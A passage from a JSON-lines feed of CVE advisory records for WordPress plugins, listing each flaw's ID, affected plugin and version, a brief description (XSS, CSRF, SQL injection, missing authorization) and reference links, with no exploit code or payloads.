Scripting.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b8f53053-5150-4fba-b8d6-3d6c9df32c69?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b8f53053-5150-4fba-b8d6-3d6c9df32c69?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3015006%40wp-sms&new=3015006%40wp-sms&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3015006%40wp-sms&new=3015006%40wp-sms&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-sms\\\/wp-sms\\\/commit\\\/6656de201efe67c7983102c344a546eed976a819\",\"name\":\"https:\\\/\\\/github.com\\\/wp-sms\\\/wp-sms\\\/commit\\\/6656de201efe67c7983102c344a546eed976a819\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2163","slug":"ninja-beaver-lite-addons-for-beaver-builder","versionImpact":"2.4.5","description":"The Ninja Beaver Add-ons for Beaver Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 2.4.5 due to insufficient input sanitization and output escaping on user supplied attributes such as urls. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e257954-9e44-4939-8e01-efceb3c0953a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e257954-9e44-4939-8e01-efceb3c0953a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ninja-beaver-lite-addons-for-beaver-builder\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ninja-beaver-lite-addons-for-beaver-builder\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5003","slug":"wp-stacker","versionImpact":"1.8.5","description":"The WP Stacker WordPress plugin through 1.8.5 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1d7d0372-bbc5-40b2-a668-253c819415c4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1d7d0372-bbc5-40b2-a668-253c819415c4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9207","slug":"buddypress-docs","versionImpact":"2.2.3","description":"The BuddyPress Docs plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.2.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2181c89-4f40-45b9-8c12-448ca263a2f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2181c89-4f40-45b9-8c12-448ca263a2f2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddypress-docs\\\/tags\\\/2.2.3\\\/includes\\\/templatetags.php#L282\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddypress-docs\\\/tags\\\/2.2.3\\\/includes\\\/templatetags.php#L282\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddypress-docs\\\/tags\\\/2.2.3\\\/includes\\\/addon-history.php#L368\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddypress-docs\\\/tags\\\/2.2.3\\\/includes\\\/addon-history.php#L368\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3162780\\\/#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3162780\\\/#file4\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3162780\\\/#file32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3162780\\\/#file32\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9454","slug":"pripre","versionImpact":"0.4.11","description":"The PriPre plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 0.4.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6662fee4-7e04-492f-bf79-2c915da92c92?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6662fee4-7e04-492f-bf79-2c915da92c92?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pripre\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pripre\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12158","slug":"ultimate-popup-creator","versionImpact":"3.2.6","description":"The Popup \u2013 MailChimp, GetResponse and ActiveCampaign Intergrations plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'upc_delete_db_data' AJAX action in all versions up to, and including, 3.2.6. This makes it possible for unauthenticated attackers to delete the DB data for the plugin.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-popup-creator\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-popup-creator\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93a698df-fd68-4fbc-946e-a9b5a7f93b71?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93a698df-fd68-4fbc-946e-a9b5a7f93b71?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12203","slug":"rss-icon-widget","versionImpact":"5.2","description":"The RSS Icon Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018link_color\u2019 parameter in all versions up to, and including, 5.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rss-icon-widget\\\/trunk\\\/rss-icon-widget.php#L195\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rss-icon-widget\\\/trunk\\\/rss-icon-widget.php#L195\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rss-icon-widget\\\/trunk\\\/rss-icon-widget.php#L83\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rss-icon-widget\\\/trunk\\\/rss-icon-widget.php#L83\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbd8fec7-c95a-4c03-ac0d-894a54906863?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbd8fec7-c95a-4c03-ac0d-894a54906863?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11886","slug":"lead-capturing-call-to-actions-by-vcita","versionImpact":"2.7.1","description":"The Contact Form and Calls To Action by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'vCitaMeetingScheduler ' shortcode in all versions up to, and including, 2.7.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-capturing-call-to-actions-by-vcita\\\/trunk\\\/lead-capturing-call-to-actions.php#L44\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-capturing-call-to-actions-by-vcita\\\/trunk\\\/lead-capturing-call-to-actions.php#L44\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-capturing-call-to-actions-by-vcita\\\/trunk\\\/vcita-widgets-functions.php#L104\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-capturing-call-to-actions-by-vcita\\\/trunk\\\/vcita-widgets-functions.php#L104\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-capturing-call-to-actions-by-vcita\\\/trunk\\\/vcita-widgets-functions.php#L63\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-capturing-call-to-actions-by-vcita\\\/trunk\\\/vcita-widgets-functions.php#L63\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a9021b4-54f8-4ba3-bc81-49271dde1b44?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a9021b4-54f8-4ba3-bc81-49271dde1b44?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13339","slug":"debounce-io-email-validator","versionImpact":"5.6.6","description":"The DeBounce Email Validator plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.6.6. This is due to missing or incorrect nonce validation on the 'debounce_email_validator' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/debounce-io-email-validator\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/debounce-io-email-validator\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9121ab04-d16b-468b-880f-8f00bcec6489?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9121ab04-d16b-468b-880f-8f00bcec6489?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8090","slug":"javascript-logic","versionImpact":"0.1","description":"The JavaScript Logic WordPress plugin through 0.1 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c9dcd450-e8ed-4058-b002-20fb3b879ee0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c9dcd450-e8ed-4058-b002-20fb3b879ee0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6786","slug":"doccheck-login","versionImpact":"1.1.5","description":"The DocCheck Login plugin for WordPress is vulnerable to unauthorized post access in all versions up to, and including, 1.1.5. This is due to plugin redirecting a user to login on a password protected post after the page has loaded. This makes it possible for unauthenticated attackers to read posts they should not have access to.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/doccheck-login\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/doccheck-login\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0739b5ec-b1c4-4451-97c1-f8d5ed26a2d5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0739b5ec-b1c4-4451-97c1-f8d5ed26a2d5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4523","slug":"idonate","description":"The IDonate \u2013 Blood Donation, Request And Donor Management System plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the admin_donor_profile_view() function in versions 2.0.0 to 2.1.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to expose an administrator\u2019s username, email address, and all donor fields.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/idonate\\\/tags\\\/2.1.9\\\/src\\\/Admin\\\/Admin.php#L76\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/idonate\\\/tags\\\/2.1.9\\\/src\\\/Admin\\\/Admin.php#L76\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/idonate\\\/tags\\\/2.1.9\\\/src\\\/Helpers\\\/IDonateAjaxHandler.php#L48\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/idonate\\\/tags\\\/2.1.9\\\/src\\\/Helpers\\\/IDonateAjaxHandler.php#L48\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3334424\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3334424\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/idonate\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/idonate\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fe7668b-9d70-44b7-a347-3922c0b8684c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fe7668b-9d70-44b7-a347-3922c0b8684c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-26536","slug":"spotify-play-button-for-wordpress","versionImpact":"2.05","description":"Auth. (contributor+) Cross-Site Scripting (XSS) vulnerability in Jonk @ Follow me Darling Sp*tify Play Button for WordPress plugin <= 2.05 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/spotify-play-button-for-wordpress\\\/wordpress-sp-tify-play-button-for-wordpress-plugin-2-05-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/spotify-play-button-for-wordpress\\\/wordpress-sp-tify-play-button-for-wordpress-plugin-2-05-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4140","slug":"wp-ultimate-csv-importer","versionImpact":"7.9.8","description":"The WP Ultimate CSV Importer plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 7.9.8 due to insufficient restriction on the 'get_header_values' function. This makes it possible for authenticated attackers, with minimal permissions such as an author, if the administrator previously grants access in the plugin settings, to modify their user role by supplying the 'wp_capabilities->cus1' parameter.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2944635\\\/wp-ultimate-csv-importer\\\/trunk\\\/wp-ultimate-csv-importer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2944635\\\/wp-ultimate-csv-importer\\\/trunk\\\/wp-ultimate-csv-importer.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fdba41f-daa5-44e8-bc47-aa8b7bd31054?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fdba41f-daa5-44e8-bc47-aa8b7bd31054?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ultimate-csv-importer\\\/tags\\\/7.9.6\\\/importExtensions\\\/ImportHelpers.php#L205\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ultimate-csv-importer\\\/tags\\\/7.9.6\\\/importExtensions\\\/ImportHelpers.php#L205\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6980","slug":"wp-sms","versionImpact":"6.5","description":"The WP SMS \u2013 Messaging & SMS Notification for WordPress, WooCommerce, GravityForms, etc plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.5. This is due to missing or incorrect nonce validation on the 'delete' action of the wp-sms-subscribers page. This makes it possible for unauthenticated attackers to delete subscribers via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94ad6b51-ff8d-48d5-9a70-1781d13990a5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94ad6b51-ff8d-48d5-9a70-1781d13990a5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-sms\\\/wp-sms\\\/commit\\\/0f36e2f521ade8ddfb3e04786defe074370afb50\",\"name\":\"https:\\\/\\\/github.com\\\/wp-sms\\\/wp-sms\\\/commit\\\/0f36e2f521ade8ddfb3e04786defe074370afb50\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3015006%40wp-sms&new=3015006%40wp-sms&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3015006%40wp-sms&new=3015006%40wp-sms&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1043","slug":"accelerated-mobile-pages","versionImpact":"1.0.93.1","description":"The AMP for WP \u2013 Accelerated Mobile Pages plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'amppb_remove_saved_layout_data' function in all versions up to, and including, 1.0.93.1. This makes it possible for authenticated attackers, with contributor access and above, to delete arbitrary posts on the site.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ffb70e82-355b-48f3-92d0-19659ed2550e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ffb70e82-355b-48f3-92d0-19659ed2550e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accelerated-mobile-pages\\\/tags\\\/1.0.93.1\\\/pagebuilder\\\/inc\\\/adminAjaxContents.php#L134\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accelerated-mobile-pages\\\/tags\\\/1.0.93.1\\\/pagebuilder\\\/inc\\\/adminAjaxContents.php#L134\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/accelerated-mobile-pages\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/accelerated-mobile-pages\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3030425\\\/accelerated-mobile-pages\\\/tags\\\/1.0.93.2\\\/pagebuilder\\\/inc\\\/adminAjaxContents.php?old=3025105&old_path=accelerated-mobile-pages%2Ftags%2F1.0.93.1%2Fpagebuilder%2Finc%2FadminAjaxContents.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3030425\\\/accelerated-mobile-pages\\\/tags\\\/1.0.93.2\\\/pagebuilder\\\/inc\\\/adminAjaxContents.php?old=3025105&old_path=accelerated-mobile-pages%2Ftags%2F1.0.93.1%2Fpagebuilder%2Finc%2FadminAjaxContents.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0951","slug":"advanced-facebook-twitter-widget","versionImpact":"1.7","description":"The Advanced Social Feeds Widget & Shortcode WordPress plugin through 1.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/88b2e479-eb15-4213-9df8-3d353074974e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/88b2e479-eb15-4213-9df8-3d353074974e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2119","slug":"luckywp-table-of-contents","versionImpact":"2.1.4","description":"The LuckyWP Table of Contents plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the attrs parameter in all versions up to, and including, 2.1.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ceb8f67-0c7a-4028-81b9-f2cdbcba1a80?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ceb8f67-0c7a-4028-81b9-f2cdbcba1a80?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/luckywp-table-of-contents\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/luckywp-table-of-contents\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4756","slug":"wp-backpack","versionImpact":"2.1","description":"The WP Backpack WordPress plugin through 2.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ce4688b6-6713-43b5-aa63-8a3b036bd332\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ce4688b6-6713-43b5-aa63-8a3b036bd332\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9850","slug":"case-study","versionImpact":"1.0","description":"The SVG Case Study plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7fe128e-02b7-4838-8575-db09d33d2340?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7fe128e-02b7-4838-8575-db09d33d2340?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/case-study\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/case-study\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12157","slug":"ultimate-popup-creator","versionImpact":"3.2.6","description":"The Popup \u2013 MailChimp, GetResponse and ActiveCampaign Intergrations plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter of the 'upc_delete_db_record' AJAX action in all versions up to, and including, 3.2.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-popup-creator\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-popup-creator\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e63ce97-40af-493d-9376-231a99d9bd58?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e63ce97-40af-493d-9376-231a99d9bd58?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13336","slug":"disable-auto-updates","versionImpact":"1.4","description":"The Disable Auto Updates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4. This is due to missing or incorrect nonce validation on the 'disable-auto-updates' page. This makes it possible for unauthenticated attackers to disable all auto updates via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/disable-auto-updates\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/disable-auto-updates\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/60413b3b-f9b0-40ca-af0a-f7cf87ab793a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/60413b3b-f9b0-40ca-af0a-f7cf87ab793a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1383","slug":"podlove-podcasting-plugin-for-wordpress","versionImpact":"4.2.2","description":"The Podlove Podcast Publisher plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.2.2. This is due to missing or incorrect nonce validation on the ajax_transcript_delete() function. This makes it possible for unauthenticated attackers to delete arbitrary episode transcripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/podlove-podcasting-plugin-for-wordpress\\\/tags\\\/4.2.0\\\/lib\\\/modules\\\/transcripts\\\/transcripts.php#L223\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/podlove-podcasting-plugin-for-wordpress\\\/tags\\\/4.2.0\\\/lib\\\/modules\\\/transcripts\\\/transcripts.php#L223\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246867\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246867\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/podlove-podcasting-plugin-for-wordpress\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/podlove-podcasting-plugin-for-wordpress\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00a95ae7-3c58-4e5e-aaef-c04d1dacf27f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00a95ae7-3c58-4e5e-aaef-c04d1dacf27f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
